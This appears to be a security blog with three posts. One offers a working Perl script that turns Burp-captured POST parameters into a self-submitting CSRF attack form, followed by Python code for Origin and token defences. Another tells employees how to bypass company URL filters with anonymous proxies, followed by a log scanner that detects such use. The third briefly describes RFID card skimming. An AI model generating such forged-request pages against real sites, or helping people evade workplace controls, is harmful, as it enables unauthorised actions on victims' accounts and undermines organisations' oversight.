December 30, 2010

Parser for CSRF

It's so easy to implement a CSRF attack. However, writing the attack out by hand in HTML can be an endless process.
Therefore I developed a short Perl script which parses request data into a CSRF request (almost the same thing).

What do you need in order to run the script:
1. Perl (obviously)
2. Burp Proxy - the attacker intercepts the request and then copies all the data to Notepad. See the example below:


My script pulls the data from the file "d:\csrf.txt", but the path can be changed. The output is written to the same path with an "html" extension.
See the source code of the script.


#!/usr/bin/perl
use strict;
use warnings;

# Input: tab-separated lines copied from Burp (type, name, value).
# Only lines whose first column is "body" become hidden form fields.
my $infile  = 'd:\\csrf.txt';
my $outfile = 'd:\\csrf.html';

open(my $inf,  '<', $infile)  or die "error while opening the input file: $!\n";
open(my $outf, '>', $outfile) or die "error while creating the output file: $!\n";
my @arrin = <$inf>;
close($inf);

print "Script by Nir Valtman\n";
print "Enter the URL:";
my $q = <STDIN>;
chomp($q);    # strip the newline so it does not end up inside action="..."

print $outf "<html xmlns=\"http://www.w3.org/1999/xhtml\" >
<head>
<title>CSRF attack</title>
</head>
<body>
<form name=\"badform\" method=\"post\" action=\"$q\">\n";

foreach my $obj (@arrin)
{
    chomp($obj);
    # columns: type, parameter name, parameter value
    my ($type, $name, $value) = split(/\t/, $obj, 3);
    next unless defined $type && $type eq "body";
    $value = '' unless defined $value;    # parameter sent with an empty value
    print $outf "<input type=\"hidden\" name=\"$name\" value=\"$value\" />\n";
}

print $outf "<script type=\"text/javascript\">
document.badform.submit();
</script>
</body>
</html>";
close($outf);
print "Done!\n";


The script is free to use - just give me credits.
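The generated form only works against an application that does not verify where a POST came from. As an added example (not part of the original post or the Perl script), the Python below first parses the same tab-separated "body / name / value" lines that the script consumes, and then shows the two server-side checks that make such an auto-submitted form fail: an Origin/Referer check against the site's own origin, and a synchronizer token bound to the session. The origin "https://bank.example", the session dict, the parameter names and the captured request text are all constructed for the demonstration.

```python
import hmac
import secrets
from urllib.parse import urlparse

# Constructed example: the origin the protected application is served from.
APP_ORIGIN = "https://bank.example"


def parse_burp_params(text):
    """Parse 'type<TAB>name<TAB>value' lines as copied from Burp (the format the
    Perl script reads). Returns the body parameters as a dict; other parameter
    types such as url or cookie lines are ignored."""
    params = {}
    for line in text.splitlines():
        parts = line.rstrip("\r\n").split("\t", 2)
        if len(parts) >= 2 and parts[0] == "body":
            params[parts[1]] = parts[2] if len(parts) == 3 else ""
    return params


def issue_csrf_token(session):
    """Store a fresh random token in the server-side session and return it so
    the page can embed it as a hidden field (synchronizer token pattern)."""
    token = secrets.token_urlsafe(32)
    session["csrf_token"] = token
    return token


def is_trusted_origin(headers):
    """Check the Origin header (falling back to Referer) against our own origin.
    A cross-site form post carries the attacking site here, and page script
    cannot override these headers in the browser."""
    src = headers.get("Origin") or headers.get("Referer")
    if not src:
        return False
    u = urlparse(src)
    return f"{u.scheme}://{u.netloc}" == APP_ORIGIN


def is_valid_request(headers, body_params, session):
    """Accept a state-changing POST only if the request comes from our own
    site AND the submitted token matches the one bound to the session."""
    if not is_trusted_origin(headers):
        return False
    expected = session.get("csrf_token", "")
    if not expected:
        return False
    submitted = body_params.get("csrf_token", "")
    # constant-time comparison so the token cannot be recovered via timing
    return hmac.compare_digest(submitted.encode(), expected.encode())


# Constructed sample input in the format the Perl script reads.
CAPTURED_REQUEST = "url\tpage\ttransfer\nbody\tto\tattacker\nbody\tamount\t1000\n"


def demo():
    """Returns (forged accepted?, genuine accepted?)."""
    session = {}
    token = issue_csrf_token(session)

    # 1. The auto-submitted form built by the script: foreign Origin, no token.
    forged_headers = {"Origin": "https://evil.example"}
    forged = is_valid_request(forged_headers, parse_burp_params(CAPTURED_REQUEST), session)

    # 2. The same parameters submitted from the real page with its token.
    genuine_headers = {"Origin": APP_ORIGIN}
    genuine_params = dict(parse_burp_params(CAPTURED_REQUEST), csrf_token=token)
    genuine = is_valid_request(genuine_headers, genuine_params, session)
    return forged, genuine


if __name__ == "__main__":
    print(demo())  # (False, True)
```

Both checks are kept because each covers a gap in the other: the token check still works when a browser strips the Origin and Referer headers, and the origin check still works if a token leaks through a page that reflects it.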

December 10, 2010

Bypass Company's URL Filtering

Lots of organizations add URL filters in order to block people from surfing to unwanted websites, e.g. Facebook, LinkedIn, Gmail, Hotmail, YouTube etc.

In order to bypass these filters (at least it is worth a try), a worker may surf through an anonymous proxy. I like to work with CyberGhost or TOR, but if you are restricted from installing applications on the company's PC, go to http://www.roxprox.com/
If that doesn't work, you can find more proxies at the following link: http://www.proxy4free.com/page1.html

Short PoC:
By surfing without a proxy I can see my real IP address:

After connecting to the same website through the proxy above, my IP has changed:
Note - the URL has changed to the proxy's web site and the domain "myipaddress.com" is encrypted.


Important: all your traffic passes through the proxy, which can decrypt and read it. I guess that you understand the risks.
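From the other side of the fence, the trace such a detour leaves in the company's own proxy logs is easy to spot. The Python below is an added example (not from the original post): it scans constructed Squid-style access log lines and flags requests that either go to an anonymizer host (the denylist holds only the two sites named above) or carry another site's URL inside a query parameter. The post only says the target domain is "encrypted"; the base64 decoding here is an assumption about how some web proxies obscure it, and the log format, client addresses and the "browse.php?u=" URL shape are constructed for the demonstration.

```python
import base64
import re
from urllib.parse import urlparse, parse_qsl

# Constructed denylist: the anonymizer sites named in the post. Extend from your own intel.
ANONYMIZER_HOSTS = {"roxprox.com", "proxy4free.com"}

URL_RE = re.compile(r"^https?://", re.IGNORECASE)


def is_anonymizer_host(host):
    """True if the host is a listed anonymizer or a subdomain of one."""
    host = host.lower()
    return any(host == h or host.endswith("." + h) for h in ANONYMIZER_HOSTS)


def looks_like_url(value):
    """True if a query parameter value is an http(s) URL, or base64-decodes to one
    (assumption: some web proxies hide the target domain from filters this way)."""
    if URL_RE.match(value):
        return True
    try:
        padded = value + "=" * (-len(value) % 4)
        decoded = base64.b64decode(padded, validate=True).decode("utf-8", "replace")
    except ValueError:  # not valid base64 (binascii.Error is a ValueError)
        return False
    return bool(URL_RE.match(decoded))


def classify(log_line):
    """Parse one constructed log line 'timestamp client method url status' and
    return the reasons it looks like anonymous-proxy use (empty list = clean)."""
    fields = log_line.split()
    if len(fields) < 4:
        return ["unparseable line"]
    u = urlparse(fields[3])
    host = u.hostname or ""
    reasons = []
    if is_anonymizer_host(host):
        reasons.append(f"known anonymizer host {host}")
    for name, value in parse_qsl(u.query, keep_blank_values=True):
        if looks_like_url(value):
            reasons.append(f"parameter {name!r} carries an embedded URL")
            break
    return reasons


def scan_log(lines):
    """Return [(line, reasons)] for every line that triggered at least one reason."""
    hits = []
    for line in lines:
        reasons = classify(line)
        if reasons:
            hits.append((line, reasons))
    return hits


# Constructed sample log. The base64 payload is built here so it is exact.
_B64_TARGET = base64.b64encode(b"http://www.myipaddress.com/").decode()
SAMPLE_LOG = [
    "1293622000.123 10.0.0.5 GET http://www.myipaddress.com/ 200",
    f"1293622030.456 10.0.0.5 GET http://www.roxprox.com/browse.php?u={_B64_TARGET}&b=4 200",
    "1293622045.789 10.0.0.7 GET http://cgiproxy.example/nph-proxy.cgi?url=http%3A%2F%2Fwww.facebook.com%2F 200",
    "1293622060.000 10.0.0.9 GET http://intranet.example/wiki?page=Home 200",
]

if __name__ == "__main__":
    for line, reasons in scan_log(SAMPLE_LOG):
        print(line.split()[1], "->", "; ".join(reasons))
```

The embedded-URL rule is the useful one: a denylist only catches sites you already know, whereas a "url=" or base64-wrapped target parameter is the mechanism every CGI-style web proxy shares, and it also surfaces the destination the employee actually visited.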

Electronic Pickpocket

Do you remember the hustle that people could do (and still can) in order to steal your credit card data? I'll remind you. All the sensitive data on a credit card is stored on a magnetic stripe and on a chip.
It has been discovered that the magnetic stripe data can be stolen using a magnetic reader. Do you think that the same data on the chip is secure? Think again...
The data on the chip embedded in credit cards may be stolen via an RFID reader. Moreover, not only credit card data can be stolen, but also the data of any device that holds information an RFID reader can read, e.g. US passports.

Attached is the video from the website http://www.wreg.com: